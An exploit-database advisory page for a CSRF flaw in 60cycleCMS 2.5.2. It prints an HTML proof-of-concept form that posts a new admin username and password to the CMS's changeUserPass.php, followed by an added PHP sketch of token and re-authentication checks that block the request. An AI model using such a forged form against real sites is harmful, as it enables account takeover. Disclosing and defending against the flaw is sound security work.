60 cycleCMS 2.5.2 – Cross-Site Request Forgery (Change Username and Password)

  • Author: EL-KAHINA
    Date: 2010-04-16
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/12266/
  • ========================================================================================
    | # Title: 60 cycleCMS V 2.5.2 CSRF Change Username & Password Exploit
    | # Author : EL-KAHINA 
    | # Home : www.iqs3cur1ty.com/vb 
    | # Web Site : http://php.opensourcecms.com/scripts/details.php?scriptid=337
    | # Tested on: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu) 
    | # Bug: CSRF
    ======================Exploit By indoushka =================================
     # Exploit: 
     
    <html>
    <body>
    <h2>Change Username or Password</h2>
    <p>Enter desired username and password.</p>
    <form action="http://127.0.0.1/60cycleCMS.2.5.2/private/changeUserPass.php" method="post" name="changeUserPass">
    Desired Username: <input name="user" type="text" /><br />
    Desired Password: <input name="pass" type="password"/><br />
    Confirm Desired Password: <input name="passConfirm" type="password"/><br />
    <input type="button" value="Submit" onclick="checkForm(this.form)" />
    </form>
    </body>
    </html>
     
    ==========================================
    Greetz : Exploit-db Team 
    all my friends: (Dz-Ghost Team)
    I'm indoushka's sister
    ------------------------------------------
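
A defensive sketch added here (not part of the original advisory and not 60cycleCMS code): the form in the advisory sends only `user`, `pass` and `passConfirm`, so the PHP below shows a server-side check that rejects a request of that shape by requiring a per-session token and the current password. The function names, the `csrf_token` and `currentPass` fields, the session layout and the stored-hash parameter are assumptions.

```php
<?php
// Added example: request check for a credential-change handler.
// All names below are hypothetical; this is not the CMS's own code.

/** Create (once per session) and return the anti-CSRF token. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Returns 'ok' or the reason the change request is rejected. */
function check_change_request(array $session, array $post, string $method, string $storedHash): string
{
    if ($method !== 'POST') {
        return 'method';
    }
    $sent = $post['csrf_token'] ?? '';
    $want = $session['csrf_token'] ?? '';
    // A form hosted on another origin cannot read this session's token.
    if (!is_string($sent) || !is_string($want) || $want === '' || !hash_equals($want, $sent)) {
        return 'csrf';
    }
    // Re-authentication: a credential change must prove knowledge of the current password.
    $current = $post['currentPass'] ?? '';
    if (!is_string($current) || !password_verify($current, $storedHash)) {
        return 'reauth';
    }
    $user = $post['user'] ?? '';
    $pass = $post['pass'] ?? '';
    if (!is_string($user) || !is_string($pass) || $user === '' || $pass === ''
        || $pass !== ($post['passConfirm'] ?? null)) {
        return 'input';
    }
    return 'ok';
}

// Constructed demo data (not from the page).
$session    = [];
$storedHash = password_hash('old-secret', PASSWORD_DEFAULT);
$token      = csrf_token($session);

// Same fields as the advisory's form: no token, no current password.
$crossSite = ['user' => 'x', 'pass' => 'y', 'passConfirm' => 'y'];
// The site's own form, which embeds the token in a hidden field.
$sameSite  = $crossSite + ['csrf_token' => $token, 'currentPass' => 'old-secret'];

echo check_change_request($session, $crossSite, 'POST', $storedHash), "\n";
echo check_change_request($session, $sameSite, 'POST', $storedHash), "\n";
```

In a real handler the `$session` and `$post` arguments would be `$_SESSION` and `$_POST`, and the token would be emitted as a hidden input in the site's own change-password form.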